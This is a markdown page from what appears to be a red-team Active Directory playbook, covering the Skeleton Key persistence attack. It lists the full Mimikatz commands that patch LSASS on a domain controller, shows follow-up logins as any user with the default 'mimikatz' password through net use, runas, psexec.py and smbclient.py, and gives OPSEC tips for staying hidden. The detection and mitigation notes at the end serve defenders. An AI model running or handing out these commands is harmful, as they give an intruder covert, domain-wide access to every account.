attack-61-skeleton-key-attack.md (3493B)
1 --- 2 title: "Attack #61 β Skeleton Key Attack" 3 description: "The Skeleton Key attack patches the LSASS process on a Domain Controller to add a master password (\"skeleton key\") that works alongside every user's realβ¦" 4 category: active-directory 5 subcategory: "Persistence" 6 tags: ["active-directory", "privilege-escalation"] 7 tools: ["Mimikatz", "PowerShell"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-Eight/π€ Attack #61 β Skeleton Key Attack.md" 11 --- 12 # π€ Attack #61 β Skeleton Key Attack 13 14 *** 15 16 ## π How It Works 17 18 The Skeleton Key attack patches the **LSASS process on a Domain Controller** to add a master password ("skeleton key") that works alongside every user's real password. After patching, the attacker can authenticate as **any domain user** using the skeleton key password (default: `mimikatz`) while the user's original password continues to work normally β making it invisible. 19 20 *** 21 22 ## βοΈ Prerequisites 23 24 | Requirement | Detail | 25 |---|---| 26 | **Domain Admin / SYSTEM on DC** | Required to patch LSASS | 27 | **Physical/remote access to DC** | Must run Mimikatz on the DC itself | 28 29 *** 30 31 ## π» Full Commands 32 33 ```powershell 34 # ββ Inject Skeleton Key into LSASS βββββββββββββββββββββββββββββββββββββββββββ 35 mimikatz.exe 36 privilege::debug 37 misc::skeleton 38 # [KDC] Skeleton Key implanted 39 # Default skeleton key password: "mimikatz" 40 41 # ββ Now authenticate as ANY user with skeleton key ββββββββββββββββββββββββββββ 42 net use \\TARGET\C$ /user:corp\Administrator mimikatz 43 # Also works: runas /user:corp\any_user /netonly cmd.exe (password: mimikatz) 44 # Original user password ALSO still works β no disruption 45 ``` 46 47 ```bash 48 # ββ Linux β authenticate with skeleton key ββββββββββββββββββββββββββββββββββββ 49 psexec.py corp.local/Administrator:'mimikatz'@DC01.corp.local 50 smbclient.py corp.local/any_user:'mimikatz'@DC01.corp.local 51 ``` 52 53 *** 54 55 ## π― OPSEC Tips 56 57 - **In-memory only** β doesn't survive DC reboot; must re-inject after restart 58 - **Only affects the patched DC** β if multiple DCs exist, must patch each one 59 - **LSASS patching may crash** β risky on production DCs 60 - **Default password is `mimikatz`** β change via custom Mimikatz build for stealth 61 62 *** 63 64 ## π‘οΈ Detection β Event IDs 65 66 | Event ID | Source | What to Look For | 67 |---|---|---| 68 | **7036** | System Log | LSASS crash or restart (if patching fails) | 69 | **Sysmon 10** | Sysmon | Process access β writing to LSASS memory | 70 | **4624** | Security Log | Successful logon with RC4 encryption (Skeleton Key forces RC4 downgrade) | 71 72 **Primary detection:** Skeleton Key forces RC4 (etype 23) for Kerberos authentication. In environments enforcing AES-only, any AS-REQ/TGT using RC4 encryption type is highly suspicious. 73 74 *** 75 76 ## π Attack Chain Context 77 78 ``` 79 [Skeleton Key] βββ Master Password for All Domain Accounts 80 β 81 ββββ π Every user has two passwords: their real one + "mimikatz" 82 ββββ β οΈ In-memory only β doesn't survive reboot 83 ββββ π Must have DA to deploy; used for persistence 84 ββββ π Defeated by: enforce AES, run Protected Process Light, monitor LSASS access 85 ``` 86 87 *** 88 89 > β **Attack #61 β Skeleton Key complete.**